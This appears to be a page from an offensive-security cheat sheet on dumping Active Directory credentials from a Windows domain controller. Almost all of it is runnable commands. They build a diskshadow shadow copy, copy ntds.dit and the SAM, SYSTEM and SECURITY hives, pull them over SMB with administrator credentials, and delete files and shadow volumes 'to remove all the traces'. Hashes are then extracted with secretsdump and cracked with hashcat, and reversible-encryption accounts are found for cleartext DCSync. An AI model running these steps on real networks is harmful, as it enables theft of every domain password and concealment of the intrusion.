Windows NT Directory Services

Create Shadow

Locate diskshadow.exe:
cmd /c where /R C:\ diskshadow.exe
Create a shadow disk:
cd \Windows\Temp
powershell -c "Add-Content add_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content add_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content add_vol.txt 'set verbose on'"
powershell -c "Add-Content add_vol.txt 'begin backup'"
powershell -c "Add-Content add_vol.txt 'add volume c: alias DCROOT'"
powershell -c "Add-Content add_vol.txt 'create'"
powershell -c "Add-Content add_vol.txt 'expose %DCROOT% w:'"
powershell -c "Add-Content add_vol.txt 'end backup'"
cmd /c diskshadow.exe /s add_vol.txt
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
begin backup
add volume c: alias DCROOT
expose %DCROOT% w:
end backup

Exfiltrate over SMB

Create a network share with anonymous access and put there all we need:
cd \Windows\Temp
copy w:\Windows\NTDS\ntds.dit ntds.dit
cmd /c reg.exe save hklm\system system.hive
cmd /c reg.exe save hklm\sam sam.hive
cmd /c reg.exe save hklm\security security.hive
Connect to the share and grab the files:
$ smbclient.py MEGACORP/administrator:'Passw0rd!'@
use C$
cd windows/temp
get ntds.dit
get system.hive
get sam.hive
get security.hive

Clean Up

Remove the shadow volume:
cd \Windows\Temp
powershell -c "Add-Content delete_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content delete_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content delete_vol.txt 'set verbose on'"
powershell -c "Add-Content delete_vol.txt 'unexpose w:'"
powershell -c "Add-Content delete_vol.txt 'delete shadows volume c:'"
powershell -c "Add-Content delete_vol.txt 'reset'"
cmd /c diskshadow.exe /s delete_vol.txt
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
unexpose w:
delete shadows volume c:
Remove the share and all the traces:
cd \Windows\Temp
rm ntds.dit
rm system.hive
rm sam.hive
rm security.hive
rm C:\Windows\Temp\meta.cab
rm add_vol.txt
rm delete_vol.txt


Parse with secretsdump.py:
$ secretsdump.py [-pwd-last-set] [-user-status] [-history] -sam sam.hive -system system.hive -security security.hive -ntds ntds.dit LOCAL > ntds.txt
$ cat ntds.txt | grep -a aad3b | grep -i 'Status=Enabled' | grep -v 31d6c | grep -v -e '\#x27; -e '{' -e '}' -e HealthMailbox | awk -F: '{print $1":"$4}' | sort -u > ntds.in
$ hashcat -m 1000 -a 0 -w 4 -O --session=ntds -o ntds.out ntds.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
Parse with aesedb (faster but less informative):
$ antdsparse <BOOTKEY> ntds.dit -o ntds.txt --progress
$ antdsparse system.hive ntds.dit -o ntds.txt --progress

Reversible Encryption

Check if enabled globally:
  • gpmc.msc > Default Domain Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Account Policies > Password Policy > Store passwords using reversible encryption > Enabled
Check if enabled for specific users:
PS > Get-ADUser -Filter {userAccountControl -band 128} -Properties userAccountControl | ft name,samAccountName,userAccountControl | tee users-revenc.txt
When DCSyncing such users, a cleartext password will be obtained.
Copy link
On this page
Create Shadow
Exfiltrate over SMB
Clean Up
Reversible Encryption